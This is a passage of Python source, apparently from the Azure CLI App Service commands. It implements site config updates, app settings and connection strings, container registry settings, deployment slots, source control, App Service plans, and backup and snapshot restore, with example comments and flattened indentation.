linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
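# A scheme, a host and a path are all required, illustrated:
#   url_validator('https://example.com/docker-compose.yml') -> True
#   url_validator('https://example.com')                     -> False  (no path)
#   url_validator('docker-compose.yml')                      -> False  (no scheme or host)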
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
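# The file name may be a local path or a URL (url_validator above decides which); either way the raw
# bytes are read and returned base64-encoded. Hypothetical inputs:
#   _get_linux_multicontainer_encoded_config_from_file('docker-compose.yml')
#   _get_linux_multicontainer_encoded_config_from_file('https://example.com/docker-compose.yml')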
# if you modify the non-optional parameters, adjust the reflection logic in this method accordingly
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is already used in azure.cli.core.commands,
# and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform == 'win32'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
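# Output shape, illustrated with hypothetical values:
#   _build_app_settings_output({'KEY1': 'v1', 'KEY2': 'v2'}, ['KEY2'])
#     -> [{'name': 'KEY1', 'value': 'v1', 'slotSetting': False},
#         {'name': 'KEY2', 'value': 'v2', 'slotSetting': True}]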
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quotes used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
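# Connection strings are passed as NAME=VALUE pairs; the split happens at the first '=' and any
# surrounding single or double quotes on the value are stripped. A hypothetical example:
#   --settings MyDb='Server=tcp:myserver.example.net;Database=mydb;'
#   stores ConnStringValueTypePair(value='Server=tcp:myserver.example.net;Database=mydb;',
#                                  type=connection_string_type) under the key 'MyDb'.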
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must provide both --multicontainer-config-file FILE and --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
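# get_external_ip mirrors the portal behaviour: apps in an App Service Environment report the
# environment's internal or IP-based-SSL virtual IP, while multi-tenant apps simply resolve their
# default host name through DNS.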
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
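# create_webapp_slot clones the production app's plan and location into the new slot; for Windows
# container apps it copies the DOCKER_REGISTRY_SERVER_* settings up front so the container image can be
# validated, and the remaining configuration is cloned afterwards when --configuration-source is given.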
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
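# config_source_control optionally caches a GitHub token first, then retries the source-control update
# up to 5 times because the SCM site may still be restarting after earlier commands (see the retry loop below).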
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# raise immediately for non-server errors (non-50x); otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update the source control token cached in Azure App Service. If no token is provided,
the command clears the existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise MutuallyExclusiveArgumentError('Usage error: --is-linux and --hyper-v cannot be used together.')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise ArgumentUsageError('Windows containers are not yet supported in an App Service Environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'get_backup_configuration', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
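# update_backup_schedule merges the supplied flags with the existing backup configuration: values that are
# not provided fall back to the current schedule, and if no configuration exists yet all of --container-url,
# --frequency, --retention and --retain-one must be given.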
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
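# restore_snapshot either overwrites the app with one of its own snapshots, or, when both
# --source-resource-group and --source-name are given, restores another app's snapshot into this app
# without overwriting; restore_content_only skips restoring the configuration (recover_configuration=False).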
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
